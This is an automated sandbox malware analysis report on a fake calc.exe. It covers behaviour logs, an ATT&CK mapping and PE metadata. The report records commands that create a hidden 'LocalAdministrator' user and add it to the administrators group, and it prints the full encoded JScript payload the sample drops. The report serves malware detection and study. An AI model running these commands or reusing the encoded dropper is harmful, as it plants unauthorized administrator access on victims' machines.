Source: C:\Users\user\Desktop\calc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_00439814 CharLowerBuffW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,_strcat,GetCurrentProcess,TerminateProcess,VariantClear,FreeLibrary,0_2_00439814
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_0044C070 push eax; ret 0_2_0044C084
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_0044C070 push eax; ret 0_2_0044C0AC
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_0044D7C3 push ecx; ret 0_2_0044D7D3

Persistence and Installation Behavior

barindex
Adds a new user with administrator rights
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /addJump to behavior
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_00412196 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00412196
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_00440FF0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00440FF0
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Users\user\Desktop\calc.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-50502
Source: C:\Users\user\Desktop\calc.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-50586
Source: C:\Users\user\Desktop\calc.exeAPI coverage: 4.6 %
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_00425639 FindFirstFileW,FindFirstFileW,SetCurrentDirectoryW,FindClose,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,0_2_00425639
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_004230D5 FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,0_2_004230D5
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_0041510D FindFirstFileW,DeleteFileW,CopyFileW,lstrcmpiW,DeleteFileW,MoveFileW,FindNextFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,0_2_0041510D
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_0042320D FindFirstFileW,FindClose,0_2_0042320D
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_00426292 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00426292
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_00425838 FindFirstFileW,FindNextFileW,FindClose,0_2_00425838
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_00422C4D FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,0_2_00422C4D
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_00414E16 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00414E16
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_00414FFA FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,0_2_00414FFA
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_0040EA76 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,FreeLibrary,0_2_0040EA76
Source: calc.exe, 00000000.00000002.1664263615.000000000051E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: r&Prod_VMware_SA
Source: calc.exe, 00000000.00000002.1664263615.000000000051E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: od_VMware_SATA_C
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_00439814 CharLowerBuffW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,_strcat,GetCurrentProcess,TerminateProcess,VariantClear,FreeLibrary,0_2_00439814
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_0040109D GetCurrentDirectoryW,GetFullPathNameW,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,SetCurrentDirectoryW,0_2_0040109D
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_00412196 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00412196
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_00415D53 mouse_event,0_2_00415D53
Source: C:\Users\user\Desktop\calc.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" JzM4PpnOtP.jseJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /addJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /addJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" Jump to behavior
Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /addJump to behavior
Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /addJump to behavior
Source: calc.exeBinary or memory string: Shell_TrayWnd
Source: calc.exeBinary or memory string: \Software\AutoIt v3\AutoItIncludeSendInput0%doffondownupASC 0%d0E051007080900020409ASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTShell_TrayWndVirtualFreeExVirtualAllocEx
Source: C:\Users\user\Desktop\calc.exeCode function: GetLocaleInfoA,0_2_004558FF
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_00454555 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00454555
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_0043738E GetUserNameW,0_2_0043738E
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_004527E8 __lock,_strlen,_strcat,_strncpy,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,_strncpy,0_2_004527E8
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_0040EA76 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,FreeLibrary,0_2_0040EA76
Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_0042F3BC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_0042F3BC
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_0042F9C7 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_0042F9C7
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_00430B6B OleInitialize,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_00430B6B

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		Valid Accounts2
Command and Scripting Interpreter		1
Create Account		1
Exploitation for Privilege Escalation		1
Masquerading		21
Input Capture		2
System Time Discovery		Remote Services21
Input Capture		1
Encrypted Channel		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts3
Native API		1
Scripting		1
Access Token Manipulation		1
Access Token Manipulation		LSASS Memory1
Security Software Discovery		Remote Desktop Protocol1
Archive Collected Data		Junk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
DLL Side-Loading		12
Process Injection		12
Process Injection		Security Account Manager1
Process Discovery		SMB/Windows Admin Shares3
Clipboard Data		SteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
DLL Side-Loading		1
Deobfuscate/Decode Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
Obfuscated Files or Information		LSA Secrets1
Account Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials1
System Owner/User Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync2
File and Directory Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem16
System Information Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1523879 Sample: calc.exe Startdate: 02/10/2024 Architecture: WINDOWS Score: 68 27 Multi AV Scanner detection for submitted file 2->27 29 Machine Learning detection for sample 2->29 31 Sigma detected: Suspicious Calculator Usage 2->31 33 Sigma detected: Suspicious Process Parents 2->33 8 calc.exe 2 1 2->8         started        process3 process4 10 wscript.exe 1 1 8->10         started        signatures5 35 Windows Scripting host queries suspicious COM object (likely to drop second stage) 10->35 37 Adds a new user with administrator rights 10->37 13 net.exe 1 10->13         started        15 net.exe 1 10->15         started        17 calc.exe 10->17         started        process6 process7 19 conhost.exe 13->19         started        21 net1.exe 1 13->21         started        23 conhost.exe 15->23         started        25 net1.exe 1 15->25         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
calc.exe3%ReversingLabs
calc.exe8%VirustotalBrowse
calc.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

World Map of Contacted IPs

No contacted IP infos

General Information

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1523879
Start date and time:2024-10-02 06:20:38 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 2m 42s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:9
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:calc.exe
Detection:MAL
Classification:mal68.winEXE@15/1@0/0
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 99%
  • Number of executed functions: 41
  • Number of non-executed functions: 296
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Stop behavior analysis, all processes terminated

Warnings

  • Not all processes where analyzed, report is missing behavior information
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASNs

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\Desktop\JzM4PpnOtP.jse

Download File
Process:C:\Users\user\Desktop\calc.exe
File Type:data
Category:dropped
Size (bytes):905
Entropy (8bit):6.202615493257142
Encrypted:false
SSDEEP:24:GPGG/rOmDyEA/lgQhs9O/E0+JSaywxBv/7DiNVkvzksm5qWdB:GPGuKmDBylgQ69OsZd1/CNavVWb
MD5:B4EB7F28555DDA63F591A950F2DB89D1
SHA1:92BA2174422096A09CE506C041165564360ACCC3
SHA-256:00C9F54DC4DEEC12DB8BA086EC347D03F978E46222D9C5EC5C6240F7AC171C5C
SHA-512:3268DE3032832A54E3251589B6D41FF43F3181E7FBC5DE6D466EA45C6DB0C8BBA6704F87954B4E28A9273067EBE20066169FF70F896A236A3F786291FB660D24
Malicious:false
Reputation:low
Preview:#@~^cQMAAA==W!x^DkKxPm`(b.7l.P1'EEBN'( /aVkDcE-.J*iWW.c7l.P.x!p+@![cV+ULDtI+3Q*.-mD,0'9$.DRM+2VmmncJ7-kQu'/_f&L~EB*ir0cWckUN.ar6`E8.okUE*'x'Zk-0 bx9+6}0vE+.NE#{'xT-u0{x'rJ#1GUYbx!+I\C.,ox`6 m4l./KN+)Ov!bO2+*[.2i6WDv\m.P4'qi4@!W ^+xTOtpt_{*b.b0vtQ&@*x6Rs+.LY4#8..l3I-mD~k{c6R^4lMZW9+zO`4#R&y#'.2~L{c0cmtm./W9+zYctQq*Of *'v2~Vxv0R^4mD/W9nzYc4_y#O2 *'v2~s'v0 ^4lD;GN.bYv4Q&*O2 b[.fpmQ'UODbxL 6DWh/4l.ZK[.`cb@!@! #-`N@*@*W#bib0c43 @!6 V.xoD4RF*m3'jY.r.o 0MG:;tC.;WNncv`%[8X*@!@!W#-`3@*@*yb#pkW`4_f@!6RV.UoDtO8b^_{?DDrxL 6DG:;4lMZG[.``cVL&b@!@!.*us*8)D+DEMUP1RdE(/O.bxovT~T#87C.Ps'r4norU,v*c,R-.M1o5b,.JIRf`"1w`]Bvub,;^qR&{2S.Of0/v(,[@!(c&"zR.!I~qKM-U|'xnx9Ei7l.~.'lch*i-lM~K',rx.YP!/..PdW^l^b[hbxkkODmYWM~E_._rP&l[[r~Ex.OP^W^C^oDG;aPCNsr.kdDDmYWM/,JW1lsb9:rUb/YMCYKDPJC[Nr~rmCV^ .6nJYI\mD~2{x+A~zmOk7nor8N+1Y`E.U^DbwORUtns^B#pWWM`\m.~;{!p;@!W s.xLY4RFp;QQ*.w ]!xcW]5Y~TB0mV/.#)2R"EU`K$+DBF~6CVk+#p4RABAA==^#~@

Static File Info

General

File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):6.508684875713569
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.96%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:calc.exe
File size:432'169 bytes
MD5:4bf28f0b6a5b20681a1378a0d8afe694
SHA1:f606479738c2e8dbb67cd9998dc35c830425c559
SHA256:cf6b9d70a6b10490407df35b3fb8968de048328614171ab5c9de51d7638eed3a
SHA512:73dd9e42e0e8489435b96776df67adb8729c47d06fecb4555447975a8f40c68980c9792446dfad2967888b45e69bbab58c29950d2089097c37ac3cb8477171ae
SSDEEP:6144:94v4sIND/AB4jYWoyGN2Ik5AfPjFWFNAy/7+dOYG+/Wi+3I:WABhABEXotkI0A8AyzKOce4
TLSH:F6948E277DE190B6E67236B4BF66D319637AFA300631950B67C00CCE7763980AA35727
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........H+..)E..)E..)E..!,..)E.\>%..)E.\>J..)E.\>..|)E.Q!...)E...Y..)E..!...)E...(..)E.(.\..)E.Q!...)E..)D..(E.\>!..)E.>"...)E.\>...)E

File Icon

Icon Hash:e4d4f0d4d4d4d460

Static PE Info

General

Entrypoint:0x44be98
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:TERMINAL_SERVER_AWARE
Time Stamp:0x4656F23B [Fri May 25 14:27:07 2007 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:4b90ccbbc6da0baeb455b5c715000e88

Entrypoint Preview

Instruction
push 00000060h
push 0045B1B8h
call 00007F36FD6BBDB9h
mov edi, 00000094h
mov eax, edi
call 00007F36FD6BA695h
mov dword ptr [ebp-18h], esp
mov esi, esp
mov dword ptr [esi], edi
push esi
call dword ptr [00459260h]
mov ecx, dword ptr [esi+10h]
mov dword ptr [004673CCh], ecx
mov eax, dword ptr [esi+04h]
mov dword ptr [004673D8h], eax
mov edx, dword ptr [esi+08h]
mov dword ptr [004673DCh], edx
mov esi, dword ptr [esi+0Ch]
and esi, 00007FFFh
mov dword ptr [004673D0h], esi
cmp ecx, 02h
je 00007F36FD6BA4DEh
or esi, 00008000h
mov dword ptr [004673D0h], esi
shl eax, 08h
add eax, edx
mov dword ptr [004673D4h], eax
xor esi, esi
push esi
mov edi, dword ptr [0045924Ch]
call edi
cmp word ptr [eax], 5A4Dh
jne 00007F36FD6BA4F1h
mov ecx, dword ptr [eax+3Ch]
add ecx, eax
cmp dword ptr [ecx], 00004550h
jne 00007F36FD6BA4E4h
movzx eax, word ptr [ecx+18h]
cmp eax, 0000010Bh
je 00007F36FD6BA4F1h
cmp eax, 0000020Bh
je 00007F36FD6BA4D7h
mov dword ptr [ebp-1Ch], esi
jmp 00007F36FD6BA4F9h
cmp dword ptr [ecx+00000084h], 0Eh
jbe 00007F36FD6BA4C4h
xor eax, eax
cmp dword ptr [ecx+000000F8h], esi
jmp 00007F36FD6BA4E0h
cmp dword ptr [ecx+74h], 0Eh
jbe 00007F36FD6BA4B4h
xor eax, eax
cmp dword ptr [ecx+000000E8h], esi
setne al
mov dword ptr [ebp-1Ch], eax

Rich Headers

Programming Language:
  • [C++] VS2003 (.NET) SP1 build 6030
  • [ASM] VS2003 (.NET) SP1 build 6030
  • [ C ] VS2003 (.NET) SP1 build 6030
  • [ C ] VS2005 build 50727
  • [RES] VS2003 (.NET) build 3077
  • [LNK] VS2003 (.NET) SP1 build 6030

Data Directories

NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IMPORT0x627c00x118.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE0x820000x4000.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x00x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0x00x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

Sections

NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
.text0x10000x573a70x57400bc894a6765d6f124be58ebcdcd3a7f98False0.5805314290830945data6.629762715452206IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata0x590000xbd9a0xbe00544a51546eeaec1f8b6fef255d861767False0.3297902960526316data4.415439786414218IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data0x650000x1cbb40x2400ee4624541522fff9a8824e447ed7a455False0.3219401041666667data4.060366195400368IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc0x820000x40000x3200a1d1b94101dc4946c92afbeed50f11f7False0.269765625data3.750061155250769IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

NameRVASizeTypeLanguageCountryZLIB Complexity
RT_ICON0x823b80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishGreat Britain0.13172043010752688
RT_ICON0x826a00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
RT_ICON0x827c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
RT_MENU0x828f00x50dataEnglishGreat Britain0.9
RT_DIALOG0x829400xfcdataEnglishGreat Britain0.6507936507936508
RT_STRING0x82a400x598dataEnglishGreat Britain0.33798882681564246
RT_STRING0x82fd80x690dataEnglishGreat Britain0.26964285714285713
RT_STRING0x836680x4cedataEnglishGreat Britain0.37073170731707317
RT_STRING0x83b380x5fadataEnglishGreat Britain0.3156862745098039
RT_STRING0x841380x572dataEnglishGreat Britain0.34146341463414637
RT_STRING0x846b00x428dataEnglishGreat Britain0.3815789473684211
RT_GROUP_ICON0x84ad80x14dataEnglishGreat Britain1.15
RT_GROUP_ICON0x84af00x14dataEnglishGreat Britain1.15
RT_GROUP_ICON0x84b080x14dataEnglishGreat Britain1.25
RT_VERSION0x84b200x19cdataEnglishGreat Britain0.5533980582524272
RT_MANIFEST0x84cc00x3a3XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishGreat Britain0.4790547798066595

Imports

DLLImport
KERNEL32.DLLQueryPerformanceCounter, QueryPerformanceFrequency, UnmapViewOfFile, OpenProcess, CreateFileMappingW, MapViewOfFile, WriteProcessMemory, ReadProcessMemory, SetFilePointer, TerminateProcess, WaitForSingleObject, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, lstrcmpiW, MoveFileW, CopyFileW, GetLastError, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, MultiByteToWideChar, WideCharToMultiByte, CompareStringW, InterlockedIncrement, InterlockedDecrement, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetModuleHandleW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, GetEnvironmentVariableW, SetEnvironmentVariableW, SetProcessWorkingSetSize, GlobalMemoryStatus, Beep, GetComputerNameW, GetWindowsDirectoryW, GetSystemDirectoryW, GetTempPathW, GetCurrentProcessId, CreatePipe, DuplicateHandle, GetStdHandle, SetPriorityClass, WriteFile, GetFileType, PeekNamedPipe, SetLastError, GetTempPathA, GetTempFileNameA, DeleteFileA, CopyFileA, CreateFileA, GetModuleHandleA, ExitProcess, HeapFree, HeapAlloc, GetStartupInfoW, GetVersionExA, TlsAlloc, TlsFree, TlsSetValue, TlsGetValue, DeleteCriticalSection, HeapReAlloc, HeapSize, VirtualProtect, VirtualAlloc, VirtualQuery, HeapDestroy, HeapCreate, VirtualFree, UnhandledExceptionFilter, SetHandleCount, GetStartupInfoA, SetStdHandle, GetSystemInfo, GetCurrentProcess, GetVersionExW, GlobalFindAtomW, LoadLibraryW, LoadLibraryExW, GlobalFree, GlobalUnlock, ReadFile, GlobalLock, GlobalAlloc, GetFileSize, CreateFileW, CloseHandle, CreateProcessW, GetCurrentThreadId, Sleep, GetProcAddress, LoadLibraryA, FlushFileBuffers, LCMapStringA, LCMapStringW, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, ExitThread, CreateThread, ResumeThread, EnterCriticalSection, LeaveCriticalSection, RaiseException, GetTimeZoneInformation, GetModuleFileNameA, FreeEnvironmentStringsA, GetSystemTimeAsFileTime, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetCommandLineW, GetCPInfo, GetLocaleInfoA, GetStringTypeA, GetStringTypeW, RtlUnwind, GetACP, GetOEMCP, InitializeCriticalSection, GetTickCount, InterlockedExchange, SetEndOfFile, CompareStringA, SetErrorMode, SetEnvironmentVariableA
ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, RegEnumKeyExW, CloseServiceHandle, UnlockServiceDatabase, LockServiceDatabase, OpenSCManagerW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegCloseKey, RegQueryValueExW, RegOpenKeyExW
COMCTL32.dllImageList_Remove, ImageList_Destroy, ImageList_EndDrag, ImageList_DragLeave, ImageList_DragMove, ImageList_DragEnter, ImageList_BeginDrag, ImageList_SetDragCursorImage, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx
comdlg32.dllGetSaveFileNameW, GetOpenFileNameW
GDI32.dllPolyBezierTo, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, GetTextExtentPoint32W, CreateDIBSection, BitBlt, GetDIBits, CreateCompatibleBitmap, CreateDCW, GetTextFaceW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, DeleteDC, CreateCompatibleDC, CreateFontW, GetDeviceCaps, GetStockObject, SetBkMode, GetPixel, RoundRect, SetBkColor, SelectObject, CreatePen, CreateSolidBrush, DeleteObject, SetTextColor
MPR.dllWNetUseConnectionW, WNetGetConnectionW, WNetAddConnection2W, WNetCancelConnection2W
